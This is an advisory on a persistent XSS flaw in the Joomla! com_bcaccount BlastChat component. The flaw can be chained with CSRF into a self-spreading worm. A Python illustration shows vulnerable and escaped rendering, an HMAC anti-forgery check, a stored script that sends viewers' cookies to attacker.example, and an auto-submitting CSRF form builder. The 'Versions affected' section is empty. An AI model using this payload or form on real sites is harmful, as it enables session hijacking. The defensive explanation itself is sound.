Joomla! Component com_bcaccount Persistent Cross-Site Scripting (XSS) Vulnerability
1. OVERVIEW

The Joomla! Component com_bcaccount is vulnerable to persistent (stored) Cross-Site Scripting (XSS).

2. PRODUCT DESCRIPTION

The Joomla! Component com_bcaccount is the chat user account management component of the widely used BlastChat chat client component (com_blastchatc). BlastChat is designed for website communities of every size, from small personal sites to large community sites, that want to offer their members and visitors a chat experience. According to the vendor, BlastChat currently serves chat to more than 50,000 websites.

3. VULNERABILITY DESCRIPTION

The Joomla! Component com_bcaccount does not properly escape user profile information when it is saved: a value submitted through the profile form is stored as-is and later rendered unescaped to anyone who views that profile. Because the profile save request can also be triggered by cross-site request forgery (CSRF), an attacker can craft a forged request that stores the XSS payload in a victim's own profile rather than only in the attacker's. A payload that re-submits itself from every viewer's browser can therefore spread as a self-propagating XSS worm across the user base.

For more information about this class of vulnerability, see OWASP Top 10 - A2, WASC-8 and CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').

4. VERSIONS AFFECTED
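The following is an added illustration of the two halves of the flaw described above, written for this page and not taken from BlastChat or the com_bcaccount source. It models a profile store with constructed sample data, a vulnerable renderer that interpolates stored fields into HTML unchanged, a hardened renderer that HTML-escapes them, the attacker-side auto-submitting form that plants a payload through CSRF, and the anti-forgery token check that breaks that chain. Field names, URLs and the token scheme are assumptions for the example, not identifiers from the component.

```python
import hmac
import html

# Constructed sample data for the example; these are not real com_bcaccount records.
PROFILES = {
    "alice": {"display_name": "Alice", "about": "Hello, I like chatting."},
    "mallory": {
        "display_name": "Mallory",
        # Stored payload: exfiltrates the viewer's cookies to an attacker host (hypothetical URL).
        "about": '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>',
    },
}


def render_profile_vulnerable(profile):
    """Mirrors the flaw: stored profile fields are dropped into the page as raw HTML."""
    return "<h2>{display_name}</h2><p>{about}</p>".format(**profile)


def render_profile_safe(profile):
    """Hardened form: every stored field is HTML-escaped at output time (quotes included,
    so the same values are also safe inside attribute values)."""
    esc = {k: html.escape(v, quote=True) for k, v in profile.items()}
    return "<h2>{display_name}</h2><p>{about}</p>".format(**esc)


def build_csrf_page(target_url, display_name, about):
    """Attacker-controlled page: a hidden form targeting the profile save endpoint that
    auto-submits from the victim's browser, carrying the victim's session cookies.
    Note the attacker escapes the payload for *their own* attribute context so the
    browser submits it byte-for-byte; the victim site is what fails to escape."""
    return (
        f'<form id="f" method="POST" action="{html.escape(target_url, quote=True)}">'
        f'<input type="hidden" name="display_name" value="{html.escape(display_name, quote=True)}">'
        f'<input type="hidden" name="about" value="{html.escape(about, quote=True)}">'
        "</form><script>document.getElementById('f').submit()</script>"
    )


def issue_csrf_token(session_secret):
    """Per-session anti-forgery token (assumed scheme: HMAC of a fixed label under a
    secret bound to the session). An attacker's page cannot read or compute this."""
    return hmac.new(session_secret, b"profile-save", "sha256").hexdigest()


def save_profile(store, username, form, session_secret, require_token=True):
    """Profile save handler. With require_token=False it behaves like the vulnerable
    component: any request bearing the victim's cookies is accepted. With the check,
    a forged cross-site POST (no valid token field) is rejected before anything is stored."""
    if require_token:
        expected = issue_csrf_token(session_secret)
        if not hmac.compare_digest(form.get("token", ""), expected):
            return False
    store[username] = {"display_name": form["display_name"], "about": form["about"]}
    return True


if __name__ == "__main__":
    print(render_profile_vulnerable(PROFILES["mallory"]))
    print(render_profile_safe(PROFILES["mallory"]))
```

Both fixes are needed: output escaping stops the stored payload from executing for viewers, and the anti-forgery token stops an attacker from writing the payload into other users' profiles in the first place, which is what turns a single stored XSS into a worm.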